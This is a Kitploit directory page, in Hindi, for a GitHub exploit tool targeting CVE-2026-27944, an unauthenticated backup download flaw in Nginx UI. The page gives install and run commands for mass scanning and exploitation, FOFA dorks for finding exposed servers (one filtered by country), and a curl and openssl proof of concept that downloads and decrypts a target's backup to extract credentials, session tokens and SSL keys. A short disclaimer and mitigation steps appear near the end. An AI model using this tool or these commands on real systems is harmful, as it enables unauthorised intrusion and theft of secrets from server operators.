Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Cve-2026-27944-Tools-Exploit — सुका सुका लाह | Kitploit
उपकरण/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
टोहीएन्क्रिप्शन/डिक्रिप्शन उपकरणपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करना
GitHub

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
bimabalance/cve-2026-27944-tools-exploit

Cve-2026-27944-Tools-Exploit

सुका सुका लाह

रिपॉजिटरी देखें
1122 महीने पहलेअभी तक समीक्षित नहीं

🚀 CVE-2026-27944: Nginx UI अप्रमाणित बैकअप शोषण

📌 विवरण

27944.py CVE-2026-27944 के लिए एक शोषण उपकरण है जो हमलावर को प्रमाणीकरण के बिना Nginx UI बैकअप डाउनलोड और डिक्रिप्ट करने की अनुमति देता है।

यह भेद्यता Nginx UI संस्करण < 2.3.2 में मौजूद है और इस तक पहुँच की अनुमति देती है:

· उपयोगकर्ता प्रमाण-पत्र और सत्र टोकन · SSL निजी कुंजियाँ · Nginx कॉन्फ़िगरेशन · डेटाबेस फ़ाइलें

🔧 विशेषताएँ

· ✅ लक्ष्य फ़ाइल से सामूहिक स्कैनिंग · ✅ एकल लक्ष्य शोषण · ✅ स्वचालित बैकअप डाउनलोड · ✅ स्वचालित AES-256-CBC डिक्रिप्ट · ✅ बैकअप से स्वचालित क्रेडेंशियल निकालें

🛠️ स्थापना विधि

git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 उपयोग विधि

  1. सामूहिक स्कैन
python 27944.py -f targets.txt -o hasil_scan
  1. एकल लक्ष्य शोषण
python 27944.py -t target.com:9000 --exploit --decrypt
  1. पूर्ण शोषण
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full

📋 लक्ष्य प्रारूप

target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 FOFA डॉर्क

title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 परिणाम आउटपुट

results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ अस्वीकरण

यह उपकरण शैक्षिक उद्देश्यों और नैतिक सुरक्षा परीक्षण के लिए बनाया गया है। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति है।

📝 तकनीकी व्याख्या

CVE-2026-27944 Nginx UI में एक गंभीर भेद्यता है जो हमलावर को प्रमाणीकरण के बिना /api/backup एंडपॉइंट तक पहुँचने की अनुमति देती है। बैकअप में AES-256 से एन्क्रिप्टेड संवेदनशील डेटा होता है, लेकिन कुंजी और IV X-Backup-Security हेडर के माध्यम से Base64 प्रारूप में भेजे जाते हैं।

CVSS स्कोर: 9.8 (गंभीर)

प्रभावित संस्करण: Nginx UI < 2.3.2

शमन:

  1. Nginx UI v2.3.3 में अपग्रेड करें
  2. /api/backup तक पहुँच को अवरुद्ध करें
  3. सभी क्रेडेंशियल रोटेट करें

💀 POC

# Check vulnerability
curl -I http://target:9000/api/backup

# Download backup
curl -s http://target:9000/api/backup -o backup.bin

# Decrypt backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
टूल डाउनलोड करें